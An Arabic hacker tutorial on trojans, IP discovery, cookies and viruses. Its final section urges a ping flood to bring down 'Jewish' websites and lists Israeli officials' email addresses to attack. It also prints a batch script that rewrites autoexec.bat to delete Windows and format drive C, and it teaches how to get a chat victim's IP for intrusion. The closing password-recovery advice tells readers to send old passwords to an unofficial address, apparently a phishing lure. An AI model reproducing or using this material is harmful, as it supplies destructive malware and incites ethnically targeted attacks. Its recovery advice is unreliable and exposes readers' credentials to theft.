تتم عملية إرسال برامج التجسس بعدة طرق من اشهرها البريد الألكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما سنرى فيما بعد) .
هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.
كيفية الإستقبال:
عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3) وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن بعد.
بوابات الأتصال Ports
يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001 يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001 لإجراء اتصال اخر.
التواصل :
قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ، وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها. وهناك عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت المغريات
2) عن طريق الـ IP Address : (وسيتم معرفه طرقه لا حقاً حسب تقسيم الكتاب)
ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.
كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :
http://www.privacy.netاو الموقع التالي :
http://www.consumer.net/
بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت وستفاجأ بالنتيجة .
مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت.
حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:
أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.
3) عن طريق الكوكي Cookie :
يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي Cookie وهي عباراة عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب . هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من خلال المتصفح او ببعض البرامج كالجارد دوق .
أنواع برامج الأختراق:-
تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:
القنابل وبرامج الطوفان Flooders/Bombers (سيتم وضع لنكات لبعض الفلودرس (فى قسم برامج هاكر) ولكن توخى الح>رفى استخدامها):-
حيث يفاجأ المستخدم بوجود مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث انه يسبب ازعاجا ومضيعا للوقت لا اكثر .
الخداع Spoofing
وهو عملية تمويه وطمس للهويه حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات لم يكتبها في حقيقة الأمر المستخدم الحقيقي.
التدمير من خلال برامج الـ Nukers
تقوم هذة البرامج بتعطيل نظام التشغيل ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام التشغيل ذاته.
الباب الخلفي Backdoor
هذا الصنف هو الأخطر وهو المحور الذي يدور حوله موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن طريقة يتم دخول المخترقين لجهاز الضحية .
الاى بى*:-
كيفية معرفة الـ IP لأى شخص على النت
نظرا لأن الكثير من الأشخاص يسال دائما عن رقم IP وكيفية معرفته قمت بوضع هذا الموضوع ليسهل على الكثيير منا التعب وخاصة المبتدئين.
س:/ ماهو رقم IP ???
كل بساطه هو مكانك على النت يعني رقم وجودك على النت عندما تقوك بالدخول الي الإنترنت يقوم بمنحك هذا الرقم والذي يكون عاده على هذا الشكل 212.34.34.78 وطوال فترة تواجدك على الإنترنت يبقى رقمك كما هو الي ان تخرج منه وعندما تقوم بالدخول اليه مره ثانيه تاخذ رقم جديد يعني ان كل مرة تدخل فيها على الإنترنت تاخذ رقم جديد وهناك طرق كثيرة لمعرفه هذا الرقم منها الآتي:-
طريقة استخراج الأيبي الخاص بك
بالنسبة لويندوز 98--ME
من START ثم RUN اكتب الأمر التالي winipcfg
بالنسبة لويندوز XP
من START ثم RUN اكتب الأمر التالىcmd /k ipconfig
هنا طريقة معرفة الـ IP للضحيه
الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر
في البداية أرسل للضحيه اي ملف او صورة او اي شيء وبعد ما توصل بنجاح تروح تفتح الدوس وطريقه فتحه كالآتي
تروح لــــ START ثم RUN وتكتب command أو Dosprmpt بعد ماتفتح شاشه الدوس السوداء تكتب هذا الأمر netstat -n مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n
بعد كتابه الأمر يطلعك الشكل الأتي :-
Proto -- Local Address -- Foreign Addres -- State
Local Address هذا رقم الاي بي الخاص بيك انت
Foreign Address هنا تحصل رقم الاي بي بتاع الضحية اخر رقم فيهم
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت
بس .
الطريقة الثانيه من خلال الماسنجير
من خلال هذا البرنامج http://www.geocities.com/mondysite/mesn.zip طريقة البرنامج افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك بعدين اظغط الزر اللي تحتهconvert IP address بعدين اظغط على الزر Listen
بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى وبكذا تكون وفرت على نفسك ارسال اي ملفات
الطريقة الثالثة
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall - ZONE ALARM - BLACK ICE
1-تجيب الIP الخاص بك ثم
2- تكتب الIP الخاص بك بالشكل هذا http:// 212.34.34.78
3- طبعا الارقام الي فوق افتراضية
4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه الضغط عليه
5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت
6- برنامج الفاير وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله
الطريقة الرابعة عن طريق الإيميل
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر
confirm.TO
يعني اذا فرضنا بريد الي تبي ترسل له ali@hotmail.com
يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل ali@hotmail.com.confirm.TO
وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به
وطبعا هو ما راح يعرف .
الطريقة الخامسة عن طريق الإيميل ايضا
لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP بتاعه من رسالته في ((HOTMAIL)) من بريد الــHOTMAIL أختر options
بعدين اختر Mail Display Settings بعدين massage headers وغير الاختيار الى advanced
الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة وبعض المعلومات الأخرى
الطريقة السادسة عن طريق برنامج ICQ
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج http://www.geocities.com/mondysite/ICQ_IP.zip
تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي بتاعه هذه اسهل طريقة .
الثغرات ألأمنيه
كثير من البرامج التي تستخدمها في حياتنا اليومية وخصوصا على الانترنت ,ليست بتلك القوة الأمنية الكافية لحماية المستخدم , حيث ان كثير منها ملئ بالثغرات الامنية غير المقصودة أو المقصودة أحيانا .
ونظرا لضخامة أحجام البرامج والأنظمة وخصوصا في الفترات الاخيرةلكثرة المميزات والخدمات التي تقدمها , فقد اتسعت الدئرة أيضا لتحتوي على كثير من الثغرات التي بأمكان الهاكرز المحترفين استغلالها والنفوذ من خلالها الى النظام او الجهاز الشخصي .
يستغرب البعض وقوع أمثال هذه الاخطاء والثغرات في أنظمة وبرامج شركات عريقة تمتلك أفضل المبرمجين والتقنيات على مستوي العالم -على أفتراض أن الثغرات الأمنية غير مقصودة - ولكن يبقي هؤلأء بشر يخطئون ويصيبون ومهما وصلو من العلم فستبقي هذه القضية سنة كونية ثابتة في حقهم وفي حق كل اليشر , ولذلك تصدر بصفة دورية برامج لتدارك الأخطاء الأمنية التي ظهرت بعد اصدار البرامج أو النظام .
اما الثغرات المقصوده:-
الثغرات الأمنية المقصودة أو التجسس المعتمد موضوع طرأ حديثا وتورط فية عدد من الشركات وخصوصا الكبيرة منها ,وذلك باضافة وظائف مخفية عن المستخدم تقوم بتسجيل بيانات المستخدم أو تحركاته واستخداماته لبرامج معينة ,وقد تراوح الدفع الى استخدام هذه الشركات لهذا الاسلوب بين الدافع التجاري والدافع السياسي وان كان الأول هو الأبراز بحسب مايظهر بالأمثلة التالية .
##اولا ##
عترفت شركت مايكروسوفت أخيرا بعد ان استمرت في الانكار لفترة طويلة أن نظم التشغيل 95/98 تقوم بارسال تقرير عن البرامج الموجودة في الجهاز لمثبت علية الى جهاز رئيسي سيرفر موجود في مقر الشركة ذلك العمل لحفظ حقوقها من خلال معرفة البرامج المقرصنة والبرامج الاصلية .
هذا يعني أن كل جهاز يستخدم أحد نظامي التشغيل السابقين وقد ارتبط بالانترنت أو بشبكة موصلة بالانترنت . قد تم ارسال تقرير عنة الى الشركة .....وقد ثبت أن بعض المستخدمين قام بتثبيت برامج لمايكروسوفت منسوخة على جهازة في وقت لم يكن هناك اتصال بالانترنت وقد عملت البرامج بشكل طبيعي , ولكن بعد الاتصال بـــــالانترنت وعند محاولة تشغيل بعض البرامج رفض الجهاز تشغيل البرامج وأعطي رسالة الى وجود خطاء مع طلب الاتصال بشركة .
ولعل هذه الوظائف المخفية والتي تقوم بالتجسس موجودة في الجزاء الخاص بشبكة مايكروسوفت .حيث يوجد برنامج معين يقوم عند استخدامك ل ام اس ان للاتصال بشبكة مايكروسوفت بقراءة جمبع المعلومات الخاصة بالبرامج المثبتة على جهازك وارسالها.
ثانياُ
فضيحة اخري لميكروسوفت ولكنها انكرتها بشدة ولازلت , وتتعلق بأننظمة التشغيل حيث الداعي اندرو فيرنانديز - كبير العلماء في شركة كبريتنمي لانتاج بركجيات الأمن - اكتشاف باب خلفي أو مفتاح يسمح لوكالة الامن القمي ان اس اي بالوصول الى اجهزة الكمبيوتر والتجسس عليها .
ويقول فيرنانديز الذي نشر برنامجا على موقعة يدعي أنة يعطل عمل المفتاح المزعوم أنة يوجد مفتاحين مرفقين على كل نسخ ويندوز يمنحان أطراف خارجية امكانية الوصول الى اجهزة المستخدمين لتركيب مكونات خاصة بلأمن دون موافقة المستخدمين . وتستخدم مايكروسوفت المفتاح الاول بوضع نماذج خدماتها الأمنية , بينما بقي استخدام النفتاح الثاني مجهول الهوية حتي خرج فرنانديز بتصريحة .
ولم ترد وكـــالة ان اس ان على الخبر بعد محاولة استطلاع رايعا , ولكن مايكروسوفت تؤكد ان التشريعات الأمريكية تقتضي أن تراجع وكالة اي اس ان كافة البرامج للتصدير فوجود هذا الرمز على المفتاح يدل على أن المنتج طابق لمعايير الوكالة
## ثالثا ##
Realjukeebox اعترف الشركة أن برنامجهاااااااا
الذي يستخدم ه حوالى 13.5 مليون كستخدم في العالم يقوم بجمع معلومات عما يستمع اليه لمستخدمون وما يسجلونة .
وقد بررت الشركة ذالك الفعل برغبة الشركة في دلااسة المعلومات التي ترد عن المستخدمين ومن ثم تكييف الخدمات الخاصة بكل مستخدم . كما نفت الشركة أن يكون هذا الفعل خرقا للخصوصية وذلك - على حد قولها - لأن البيانات التي جمعت لم تخزن ولم تنقل لشركة اخري .
ويقوم البرنامج بفحص القرص الصلب وعمل تقرير يحتوي على عدد الأغاني المخزنة وهيئة الملفات ونوع الموسيقي المفضل للمستخدم ونوع مشفل الملفات الصوتية الذي يستخدمة ..
رابعا :تضمن برنامج اي اس كيو برنامجا من نوع حصان طرودة يسمح بأجراء عمليات اختراق , وقد دمج هذا البرنامج في ملف التركيب الاصلى للبرنامج الأصلى الذي تصدرة الشركة الاسرئيلية..
Norton Anti Virus وقد اكتشاف هذا البرنامج الخبيث برنامج
ولكن الشركة الاسرئيلية نفت بشدة تضمين هذا البرنامج في ملف التركيب الاصلي , وادعت أنة قد دس فية بدون علمها . ولكن كثير من المحللين يشكون في التراهة الأمنية للشكة المصممة , ويقولون أنها ضمنت هذا البرنامج بشكل مقصود ولأغراض خفية خفية خفية ., وهذا غيض من فيض لم يكتشف حتي الان .
الفيـــــــــــــــــــرس:-
ماهي الفيروسات؟
فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، تمت كتابتها بطريقة معينة. سُمّيت بالفيروسات، لأنها تشبه تلك الكائنات المتطفلة في صفتين رئيسيتين:
تحتاج فيروسات الكومبيوتر دائماً إلى ملف عائل تعيش متستّرةً فيه:
فالفيروسات، دائماً تتستر خلف ملف آخر، و لكنها تأخذ زمام السيطرة على البرنامج المصاب. بحيث أنه حين يتم تشغيل البرنامج المصاب، يتم تشغيل الفيروس أولاً.
تستطيع فيروسات الكومبيوتر أن تنسخ نفسها:
تتم كتابة هذه البرامج المؤذية بحيث تقوم بنسخ نفسها فوراً بمجرّدتشغيل البرنامج المصاب. و هي تنسخ نفسها للأقراص الأخرى، فإذا كان الكومبيوتر مصاباً ووضعت فيه قرصاً مرناً، يتم نسخ الفيروس اوتوماتيكياً للقرص المرن. و نظراً لهذه الخاصية في الفيروسات، تجد أن القرص المصاب يعطيك علامة أنه ممتلئ تماماً برغم أنك لم تقم بتخزين غير ملفات ذات حجم صغير.
ما الفرق بين الدوده والتورجان والفيرس
الدودة: تصيب الدودة الكمبيوترات الموصلة بالشبكة بشكل اوتوماتيكي و من غير تدخل الانسان و هذا الامر يجعلها تنتشر بشكل اوسع و اسرع عن الفيروسات . الفرق بينهم هو ان الديدان لا تقوم بحذف او تغيير الملفات بل تقوم بتهليك موارد الجهاز و استخدام الذاكرة بشكل فظيع مما يؤدي الى بطء ملحوظ جدا للجهاز , و من المهم تحديث نسخ النظام المستخدم في الجهاز كي يتم تجنب الديدان.
ومن المهم عند الحديث عن الديدان الإشارة إلى تلك التي تنتشر عن طريق الإيميل. حيث يرفق بالرسالة ملفاً يحتوي على دودة، و عندما يشغّل المرسل إليه الملف المرفق، تقوم الدودة بنشر نفسها إلى جميع الإيميلات الموجودة في دفتر عناوين الضحية.
التروجان: وهو عبارة عن برنامج يغري المستخدم باهميته او بشكله او باسمه ان كان جذاباً, و في الواقع هو برنامج يقوم بفتح باب خلفي ان صح التعبير بمجرد تشغيله , و من خلال هذا الباب الخلفي يقوم المخترق باختراق الجهاز و بامكانه التحكم بالجهاز بشكل كبير حتى في بعض الاحيان يستطيع القيام بامور , صاحب الجهاز نفسه لا يستطيع القيام بها , و هذا لا يرجع لملف التروجان, لكن ملف التروجان هو الذي فتح للمخترق الباب ان صح التعبير بتشغيله اياه.
الفيروس: كما ذكرنا , الفيروس عبارة عن برنامج صمم لينشر نفسه بين الملفات و يندمج او يلتصق بالبرامج. عند تشغيل البرنامج المصاب فانه قد يصيب باقي الملفات الموجودة معه في القرص الصلب او المرن, لذا الفيروس يحتاج الى تدخل من جانب المستخدم كي ينتشر , بطبيعة الحال التدخل عبارة عن تشغيله بعد ان تم جلبه من الايميل او تنزيله من الانترنت او من خلال تبادل الاقراص المرنة.
كيف تعمل الفيروسات؟
في الواقع يقوم الفيروس في حالة إصابة الملف بإضافة نفسه في بداية أو نهاية الملف المصاب، دون أن يقوم فعلياً بأي تغيير في مكوّنات الملف الأصلية. لننظر للصورة التالية التي توضّح شكل البرنامج غير المصاب بفيروس:
نلاحظ أنه عند استدعاء البرنامج فإنه يعمل بشكل طبيعي.
والآن لنتصوّر أنه تم اصابة البرنامج بفيروس. في الواقع يقوم الفيروس بلصق نفسه في البرنامج كما أسلفنا دون أن يغير في محتويات الملف شيئاً. و طريقة اللصق تكون، إما أنه يقوم بلصق نفسه في بداية البرنامج، بحيث يتم تشغيله هو قبل البرنامج نفسه:
وقد تكون طريقة التحاق الفيروس بالملف بأن يضع نفسه في نهاية البرنامج المصاب. و يضع علامة في بدايته، هكذا:-
إن هذا الفيروس، يختبئ في نهاية الملف المصاب، و يضع في مقدّمة البرنامج مؤشّراً بحيث أنه عندما يتم استدعاء البرنامج و تشغيله، يحوّل السيطرة للفيروس بدلاً من تشغيل البرنامج.
وفي الحالتين قد يعود الفيروس بعد الانتهاء من تنفيذ عمله المؤذي لتشغيل البرنامج، و لكنه قد لا يعود أيضاً. و يسبب أضراراً جسيمة للجهاز.
أنواع الفيروسات:-
هناك الآف من الفيروسات المنتشرة عبر الانترنت , لكن اغلبها ما يقع تحت هذه النقاط الستة:
1: فيروسات بدء التشغيل او Boot Sector Virus
هذا النوع من الفيروسات يصيب قطاع الاقلاع في الجهاز , و هو المكان المخصص الذي يتجه اليه الكمبيوتر في بداية تشغيل الجهاز. و هذا النوع من الفيروسات قد يمنع المستخدم من الوصول الى النظام ويمنعه من اقلاع الجهاز.
2: فيروس الملفات او File Virus
يصيب البرامج عادة , و ينتشر بين الملفات الاخرى و البرامج الاخرى عند تشغيله.
3: فيروس الماكرو او Macro Virus
هذه الفيروسات تصيب برامج الميكروسوفت اوفيس مثل الوورد و الاكسل, و تعتبر ذات انتشار واسع جدا تقدر ب 75% من عدد الفيروسات الموجودة. يقوم هذا النوع من الفيروسات بتغيير بعض المستندات الموجودة في القرص الصلب و خصوصا الوورد , قد تجد بعض التصرفات الغير منطقية في بعض الاحيان مثل طلب باسوورد لفتح ملف تعرف انك لم تضع عليه باسوورد , و ايضا تجد بعض الكلمات قد تغير مكانها و اضيفت كلمات جديدة لا علاقة لها بالموضوع . هي اساساً ليست ضارة, لكنها مزعجة نوعاً ما و قد تكون مدمرة احيانا!
4: الفيروس المتعدد الاجزاء او Multipartite Virus
و هو الذي يقوم باصابة الملفات مع قطاع الاقلاع في نفس الوقت و يكون مدمراً في كثير من الاحيان اذا لم تتم الوقاية منه.
5: الفيروس المتطور او Polymorphic Virus
هي فيروسات متطورة نوعا ما حيث انها تغير الشفرة كلما انتقلت من جهاز الى آخر. نظريا, يصعب على مضادات الفيروسات التخلص منها لكن عمليا و مع تطور المضادات فالخطر اصبح غير مخيف.
6: الفيروس المختفي اوStealth Virus
تخفي نفسها بان تجعل الملف المصاب سليما و تخدع مضادات الفيروسات بان الملف سليم و ليس مصاباً بفيروس. مع تطور مضادات الفيروسات اصبح من السهل كشف هذا النوع.
ماهي العلامات الشائعة لوجود فيروس في الجهاز:
بطء الجهاز الشديد، بما لا يتناسب مع عدد البرامج التي تعمل في نفس الوقت.
امتلاء القرص بما لا يتناسب مع عدد و حجم الملفات الموجودة عليه.
ظهور مربّعات حوار غريبة اثناء العمل على الجهاز.
اضاءة لمبة القرص الصلب أو القرص المرن، دون أن تقوم بعملية فتح أو حفظ ملف.
لابد أن تعرف أن هذه العلامات لا تعني بالضرورة وجود فيروس، فقد يكون بعضها بسبب مشكلة في عتاد الجهاز مثلاً.
آثار الاختراق:-
الاستيلاء على مواقع ويب الموجودة على الشبكة وتغيير محتوياتها باعطاء معلومـــــــات مغلوطة عن الموقع ,أو من باب التحدي ومن ثم التهكم بعد نجاح العملية ,أو باعطاء اراء مخالفة لما كان يطرجة الموقع.
السطو بغرض الكسب كتحويل الحسابات داخل البنوك ,او الحصول على خدمات مجانية ,أوأي معلومات ذات مكاسب مالية ,كارقام البطاقات الائتمان .وتصل الخطورة احيانا الى نشر هذه البيانات على الشبكة مما يضاعف من الخسائر المحتملة
.اقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة كالبريد الاكتروني ,والحصول على خدمة النفاذ الى الانترنت فيلاحظ الضحية انتهاء ساعاتة دون أ، يستخدمها , وكذلك انتحال الشخصية في منتديات النقاش والدردشة ومن ثم طرح افكار معاكسة لما كان يطرح ,او محاولة الدخول الى البريد الاكتروني دون ان يستطيع ذلك.
تطبيقات عمليه:-*
فيما يلى اهم التطبيقات العمليه على ما سبق:-
كيفيه تدمير موقع يهودى شارك فى الحرب على اليهود(مهم)
كيف تصنع فيرس كيفيه استرجاع ايميلك المسروق
كيفيه تدمير موقع يهودى:-
1-افتح الدوس
2-اكتب
(ping http://www.xxx.com/ -t)
لا تكتب الاقواس
xxx اسم الموقع
لاحظ المسافات بين
1-ping و اسم الموقع
2-اسم الموقع و -t
ستلاحظ تكرر ظهور جمل مع اي بي الموقع
هذا يدل على ان الدوس يرسل رسائل الى الموقع فيرد عليه الى ان يتوقف الموقع عن العمل
ملاحظة:يجب تنفيذ هذه الطريقة في اكثر من نافذة للدوس
و ان يشترك اكثر من شخص حتى تكون الطريقة مجدية و سريعة المفعول
شارك فى الحرب على اليهودـ-
شارك بتدمير هذه الايميلس او اختراقها ان استطعت والله الموفق.
barak@pmo.gov.il
ايميل ايهود باراك
sar@moc.gov.il
ايميل وزير الاتصالات بينيامين اليازر
sar@mod.gov.il
ايميل ايهود باراك وزير الدفاع ايضاً
sar@education.gov.il
وزارة التعليم
sar@environment.gov.il
وزيرة البيئة دايا ايتزك
sar@mof.gov.il
وزير الاقتصاد افراهام شوكت
sar@mofa.gov.il
دايفد ليفي وزير الخارجية على ما اعتقد
sar@matat.health.gov.il
وزير الصحة رابي شلومو بنزري
sar@moch.gov.il
بينيامين اليازر وزير الإسكان
sar@moia.gov.il
يولي تامر وزير الهجرة
sar@moit.gov.il
ران كوهين وزير او وزيرة التجارة والصناعة
sar@moin.gov.il
ناتان شرنسكي وزير الداخلية
sar@mops.gov.il
وزير الامن الداخلي شلومو بن عامي
sar@justice.gov.il
وزير العدل يوسف بيلين واللي ماله داعي
sar@molsa.gov.il
رانان موهن وزير الراحة والعمل
sar@mni.gov.il
ايلياهو سوسا وزير البنية التحتية
sar@religions.gov.il
رابي يتزكاه وزير الدين
minister@most.gov.il
ماتان فيالي وزير الرياضة والثقافة والعلم
sar@tourism.gov.il
امنون بينكي شاهاك وزير السياحة
sar@mot.gov.il
امنون بينكي شاهاك وزير الاتصالات
كيف تصنع فيرس:-
افتح صفحه نوت باد واطبع ه>ا الكود
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
ثم اكتب اسم الملفautoexec.bat
ولا ينقص لتشغيله سوى ضغطتين بزر الماوس ثم يكون الدرايف سى ابيض تماما وستكتشف ه>ا ان كان لديك سيستم اخر.
كيفيه استرجاع ايميلك المسروق:-
كثرت في الآونة الأخيرة سرقة الايميلات ...... والمشكلة ان السبب في فقدان أو سرقة الايميل هي ظهور العديد من البرامج المخصصه لسرقه الإيميل وهي التي تقوم بإرسال ملفات التجسس عن طريق الماسنجر أو الايميل وعندما تستقبلها تقوم بسرقة جميع كلمات السر من على جهازك سواء للإيميل أو حتى إشتراكك في الانترنت وهناك ايضا برامج تقوم بتخمين كلمات السر وأصبح الجميع قادر على سرقت الايميلات وليس فقط الهاكرز كما كان في السابق.
لذا يجب تغيير كلمة السر للأيميل إلى حروف وأرقام وعلامات أو شرطات كالتالي b89_hy6_u9s لكي يصعب على برامج التخمين الحصول على كلمة السر.
أما بالنسبة للأخوان اللي أنسرقت ايميلاتهم او فقدوا كلمة السر فهناك طريقة سهلة ومجربه وناجحة 100% بدون برامج وبدون تعب كل ماعليك فعله هو التالي:
تقوم بإرسال رسالة إلى شركة الهوتميل وهو
service_x@hotmail.com <mailto:service_x@hotmail.com>
وتكتب عنوان الرسالة:
PW VERIFICATION INFO ENCLOSED
وتملأ هذا النموذج
first mane : أسمك الأول
- last mane : أسمك الأخير
- Sign-in name : ايميلك المسروق
- Country/region : الدولة
- State : المدينه
- Zip or postal code : رقم الكود(رقم كود السعودية966)
- Approximate date of last successful sign-in or approximate date of account registration : تاريخ آخر يوم فتحت إيميلك
- The name of your ISP :
- As many "old" outdated passwords you used in the past as you can remember وهنا تكتب كلمات السر القديمة التى تتذكرها
وبعد الإنتهاء ....تقوم بإرسالها
